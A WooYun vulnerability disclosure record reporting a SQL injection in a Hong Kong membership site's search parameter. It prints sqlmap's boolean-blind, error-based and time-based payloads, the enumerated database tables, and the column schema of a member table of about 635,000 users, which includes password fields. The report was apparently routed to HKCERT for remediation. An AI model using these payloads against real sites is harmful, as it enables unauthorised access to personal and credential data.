当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0176962

漏洞标题:財富聯盟官方网站SQL注入/63万多用户信息(香港地區)

相关厂商:財富聯盟

漏洞作者: 路人甲

提交时间:2016-02-19 16:25

修复时间:2016-02-24 16:30

公开时间:2016-02-24 16:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-19: 细节已通知厂商并且等待厂商处理中
2016-02-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

。。。

详细说明:

http://**.**.**.**/index.php?app=search&vip=1&act=seller&classid=435&type=img
classid存在注入


Database: aajflm
+------------+---------+
| Table      | Entries |
+------------+---------+
| ecm_member | 635469  |
+------------+---------+

漏洞证明:

sqlmap identified the following injection point(s) with a total of 591 HTTP(s) requests:
---
Parameter: classid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
current user:    'o2oxx@localhost'
current database:    'aajflm'
current user is DBA:    False
available databases [2]:
[*] aajflm
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: classid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: aajflm
[107 tables]
+--------------------------+
| ecm_acategory            |
| ecm_address              |
| ecm_article              |
| ecm_attribute            |
| ecm_bankcard             |
| ecm_bankcard_record      |
| ecm_brand                |
| ecm_bvlog                |
| ecm_cart                 |
| ecm_category_goods       |
| ecm_category_store       |
| ecm_cflog                |
| ecm_collect              |
| ecm_comment              |
| ecm_consumption_code     |
| ecm_coupon               |
| ecm_coupon_sn            |
| ecm_exchange             |
| ecm_financial            |
| ecm_financial_records    |
| ecm_financial_records_ls |
| ecm_friend               |
| ecm_function             |
| ecm_gcategory            |
| ecm_goods                |
| ecm_goods_adv            |
| ecm_goods_attr           |
| ecm_goods_cart           |
| ecm_goods_image          |
| ecm_goods_order          |
| ecm_goods_qa             |
| ecm_goods_spec           |
| ecm_goods_spec_images    |
| ecm_goods_statistics     |
| ecm_groupbuy             |
| ecm_groupbuy_log         |
| ecm_incomebrand          |
| ecm_incomelog            |
| ecm_incomeshop           |
| ecm_jflog                |
| ecm_jfrestrictlog        |
| ecm_jy_income            |
| ecm_ka_cart              |
| ecm_ka_order             |
| ecm_ka_order_goods       |
| ecm_lottery              |
| ecm_mail_queue           |
| ecm_mcc                  |
| ecm_member               |
| ecm_member_account       |
| ecm_member_examrank      |
| ecm_message              |
| ecm_module               |
| ecm_myarea               |
| ecm_mycity               |
| ecm_myprovince           |
| ecm_navigation           |
| ecm_order                |
| ecm_order_extm           |
| ecm_order_goods          |
| ecm_order_log            |
| ecm_pageview             |
| ecm_partner              |
| ecm_payment              |
| ecm_pos_records          |
| ecm_pos_shop             |
| ecm_poslog               |
| ecm_posmember            |
| ecm_poss                 |
| ecm_postal               |
| ecm_privilege            |
| ecm_pro_bvrecord         |
| ecm_proposal             |
| ecm_recommend            |
| ecm_recommended_goods    |
| ecm_region               |
| ecm_sales                |
| ecm_scategory            |
| ecm_scope                |
| ecm_sessions             |
| ecm_sessions_data        |
| ecm_sgrade               |
| ecm_shipping             |
| ecm_shop                 |
| ecm_shop_10yuan          |
| ecm_shop_change_log      |
| ecm_shop_goods           |
| ecm_shop_ka              |
| ecm_shop_member          |
| ecm_shoptype             |
| ecm_shopujf              |
| ecm_spreader_member      |
| ecm_store                |
| ecm_tmpuser              |
| ecm_ukinds               |
| ecm_uploaded_file        |
| ecm_user_cf              |
| ecm_user_change_log      |
| ecm_user_coupon          |
| ecm_user_priv            |
| ecm_user_project         |
| ecm_wealthbean           |
| ecm_withdrawals          |
| ecm_yqf_data             |
| ecm_zsjflog              |
| sj_level                 |
| sj_member                |
+--------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: classid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: aajflm
+------------+---------+
| Table      | Entries |
+------------+---------+
| ecm_member | 635469  |
+------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: classid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: aajflm
Table: ecm_member
[43 columns]
+-----------------+---------------------+
| Column          | Type                |
+-----------------+---------------------+
| level           | int(11)             |
| activation      | varchar(60)         |
| agreeprot       | tinyint(1)          |
| birthday        | date                |
| cncode          | varchar(25)         |
| dcncode         | varchar(25)         |
| dlevel          | int(11)             |
| double_count    | decimal(10,2)       |
| double_overtime | varchar(30)         |
| double_status   | int(10)             |
| email           | varchar(60)         |
| examrankid      | int(11)             |
| feed_config     | text                |
| fgtimes         | int(11)             |
| gender          | tinyint(3) unsigned |
| im_aliww        | varchar(60)         |
| im_msn          | varchar(60)         |
| im_qq           | varchar(60)         |
| im_skype        | varchar(60)         |
| im_yahoo        | varchar(60)         |
| isblack         | tinyint(4)          |
| isshop          | int(11)             |
| last_ip         | varchar(15)         |
| last_login      | int(10) unsigned    |
| lgtimes         | int(11)             |
| logins          | int(10) unsigned    |
| ngtimes         | int(11)             |
| openshop        | int(11)             |
| outer_id        | int(10) unsigned    |
| password        | varchar(32)         |
| phone_mob       | varchar(60)         |
| phone_tel       | varchar(60)         |
| portrait        | varchar(255)        |
| qxsh            | tinyint(1)          |
| real_name       | varchar(60)         |
| reg_time        | int(10) unsigned    |
| shopid          | int(11)             |
| shopnum         | int(11)             |
| tmpshopnum      | int(11)             |
| tpassword       | varchar(32)         |
| ugrade          | tinyint(3) unsigned |
| user_id         | int(10) unsigned    |
| user_name       | varchar(60)         |
+-----------------+---------------------+

修复方案:

参数过滤,参数化查询

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-24 16:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无